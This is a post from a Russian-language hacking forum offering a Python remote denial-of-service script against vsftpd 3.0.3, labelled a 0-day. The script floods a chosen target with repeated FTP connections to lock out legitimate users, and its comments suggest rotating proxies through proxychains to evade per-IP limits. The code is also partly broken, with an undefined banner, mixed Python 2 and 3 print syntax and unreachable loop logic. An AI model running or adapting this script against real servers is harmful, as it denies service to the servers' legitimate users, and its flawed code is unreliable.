• XSS.stack #1 – первый литературный журнал от юзеров форума

DoS DoS, vsftpd 3.0.3, CVE-N\A, (0-day 29.03.21)

Отслеживать
Nomak

Nomak

HDD-drive
Забанен
Регистрация
25.02.2021
Сообщения
22
Реакции
10
Депозит
0.00
Пожалуйста, обратите внимание, что пользователь заблокирован
Service :-vsftpd
Version :-3.0.3
Type :- Remote Denial of Service
Risk :- medium

Python: 
# Exploit Title: vsftpd 3.0.3 - Remote Denial of Service
# Exploit Author: xynmaps
"""
VSFTPD only lets a certain amount of connections to be made to the server, so, by repeatedly making new connections to the server,
you can block other legitimite users from making a connection to the server, if the the connections/ip isn't limited.
(if it's limited, just run this script from different proxies using proxychains, and it will work)
"""
import socket
import sys
import threading
import subprocess
import time

usage = "{} <TARGET> <PORT(DEFAULT:21> <MAX_CONNS(DEFAULT:50)>".format(sys.argv[0])
 
def test(t,p):
        s = socket.socket()
        s.settimeout(10)
        try:
                s.connect((t, p))
                response = s.recv(65535)
                s.close()
                return 0
        except socket.error:
                print("Port {} is not open, please specify a port that is open.".format(p))
                sys.exit()
def attack(targ, po, id):
        try:
                subprocess.Popen("ftp {0} {1}".format(targ, po), shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                #print("Worker {} running".format(id))
        except OSError: pass
def main():
        global target, port, start
        print banner
        try:
                target = sys.argv[1]
        except:
                print usage
                sys.exit()
        try:
                port = int(sys.argv[2])
        except:
                port = 21
        try:
                conns = int(sys.argv[3])
        except:
                conns = 50
        print("[!] Testing if {0}:{1} is open".format(target, port))
        test(target, port)
        print("[+] Port {} open, starting attack...".format(port))
        time.sleep(2)
        print("[+] Attack started on {0}:{1}!".format(target, port))
        def loop(target, port, conns):
                global start
                threading.Thread(target=timer).start()
                while 1:
                        for i in range(1, conns + 3):
                                t = threading.Thread(target=attack, args=(target,port,i,))
                                t.start()
                                if i > conns + 2:
                                        t.join()
                                        break
                                        loop()
 
        t = threading.Thread(target=loop, args=(target, port, conns,))
        t.start()
 
def timer():
        start = time.time()
        while 1:
                if start < time.time() + float(900): pass
                else:
                        subprocess.Popen("pkill ftp", shell=True, stdout=subprocess.PIPE, stderr=subprocess.PIPE)
                        t = threading.Thread(target=loop, args=(target, port,))
                        t.start()
                        break
 
main()
 
admin


Напишите ответ...
  • Вставить:
Прикрепить файлы
Верх